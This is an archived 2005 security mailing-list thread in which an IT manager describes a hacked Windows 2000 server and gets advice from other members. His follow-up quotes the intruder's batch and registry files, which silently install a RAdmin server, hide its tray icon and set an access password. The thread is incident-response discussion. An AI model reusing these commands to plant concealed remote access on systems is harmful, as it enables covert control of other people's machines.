Security Basics mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Hacked

From: "Mauricio Fernandez" <mfernandez () fdta-valles org>
Date: Thu, 14 Apr 2005 15:19:19 -0400
This is what I did:

Detach the machine from the net, stopped explorer.exe process and ran the
ServerProtect Antivirus from TrendMicro. AV found 4357 virus on .tmp
files, mostly of them on Winnt\temp\ folder. Some files from the VoIP
system installed on that box was infected, so I remove it and reinstalled.

The content of the bat files is:
Pro.bat
r_server.exe /install /silence
regedit /S hide.reg
net start r_server

start.bat
@echo off
r_server /pass:a1b2c3 /save

hide.reg
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00

the registry on the server has two more settings on this location for
PARAMETER and PORT keys.

Now, my principal concern is HOW THEY PUTT THAT THING ON MY SERVER??? The
box is a w2k sp4 fully patched...

Thank you very much to everybody for the help... 

There are two log files on the same folder, this is how they look

Netfxsl.log
2005-02-10 03:06:38] 
[2005-02-10 03:06:38] ShadowLaunch started
[2005-02-10 03:06:38] Extracting embedded exe to C:\WINNT\TEMP\SL67B.tmp
[2005-02-10 03:06:38] C:\ is not running on FAT (NTFS).
[2005-02-10 03:06:38] User is NT admin; preparing to shadow launch the
process.
[2005-02-10 03:06:38] PrepareShadowLaunch:
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\fusion.dll
[2005-02-10 03:06:38] move
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\fusion.dll
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\SHADOW13892\_fusion.dll
[2005-02-10 03:06:38] copy
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\SHADOW13892\_fusion.dll
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\fusion.dll
[2005-02-10 03:06:38] PrepareShadowLaunch:
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\mscorjit.dll
[2005-02-10 03:06:38] move
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\mscorjit.dll
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\SHADOW13892\_mscorjit.dll
[2005-02-10 03:06:38] copy
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\SHADOW13892\_mscorjit.dll
C:\WINNT\Microsoft.NET\Framework\v1.1.4322\mscorjit.dll


netfxupdate.log
[2005-02-10 03:07:30] START: invocation ID = 1; version = v1.1.4322;
params = 
[2005-02-10 03:07:30] REGWRITE: value already exists:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
NetFxUpdate_v1.1.4322
[2005-02-10 03:07:30] REGDELETE:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetFxUpdate_v1.1.4322
[2005-02-10 03:07:30] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\netfxupdate.exe" 2 v1.1.4322
NI NID
[2005-02-10 03:07:30] START: invocation ID = 2; version = v1.1.4322;
params = 
[2005-02-10 03:07:30] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.dll"
[2005-02-10 03:07:32] RETURN: 0
[2005-02-10 03:07:32] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\CustomMarshalers.dll"
[2005-02-10 03:07:32] RETURN: 0
[2005-02-10 03:07:32] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Drawing.Design.dll"
[2005-02-10 03:07:33] RETURN: 0
[2005-02-10 03:07:33] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Windows.Forms.dll"
[2005-02-10 03:07:34] RETURN: 0
[2005-02-10 03:07:34] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Xml.dll"
[2005-02-10 03:07:35] RETURN: 0
[2005-02-10 03:07:35] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Design.dll"
[2005-02-10 03:07:41] RETURN: 0
[2005-02-10 03:07:41] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Drawing.dll"
[2005-02-10 03:07:42] RETURN: 0
[2005-02-10 03:07:42] INVOKE:
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent
"C:\WINNT\Microsoft.NET\Framework\v1.1.4322\mscorlib.dll"
[2005-02-10 03:07:42] RETURN: 0



Mauricio Fernández S.
IT Manager
Tel. 591- 445-25160
Fax. 591- 441-15056
mfernandez () fdta-valles org
www.fdta-valles.org
Cochabamba - Bolivia

-----Original Message-----
From: confi dential [mailto:arpanet.biz () gmail com] 
Sent: Thursday, April 14, 2005 2:39 PM
To: mfernandez () fdta-valles org
Cc: security-basics () securityfocus com
Subject: Re: Hacked

Hello Mauricio,
RAdmin is used for remote administration, the attacker installed that
application on your machine so he could have control over it.
Remove those files and check what start.bat and pro.bat do so you
could remove the application completely off your system.

Also, if you haven't yet - download and install the updates from
http://windowsupdate.microsoft.com/


   Or Weinberger 

On 4/14/05, Mauricio Fernandez <mfernandez () fdta-valles org> wrote:

This morning I found a wwwhack window opened on one of my w2k servers,
antivirus agent was deleted (TrendMicro) and when I reinstall it back,

it

found about 4500 viruses named PE_PARITE.B

Now the virus is still regenerating itself creating files on winnt\temp
folder, I saw the task list and stopped all the suspicious process, but
the virus still goes on...

The virus/hacker created a folder named RADMIN, where he copied these
files:
r_server.exe
admdll.dll
hide.reg
raddrv.dll
pro.bat
start.bat

Does anyone knows how to remove this virus and avoid this hack
vulnerability?

Mauricio Fernández S.
IT Manager
Tel. 591- 445-25160
Fax. 591- 441-15056
mfernandez () fdta-valles org
www.fdta-valles.org
Cochabamba - Bolivia

Attachment: smime.p7s
Description:

Previous By Date Next
Previous By Thread Next

Current thread: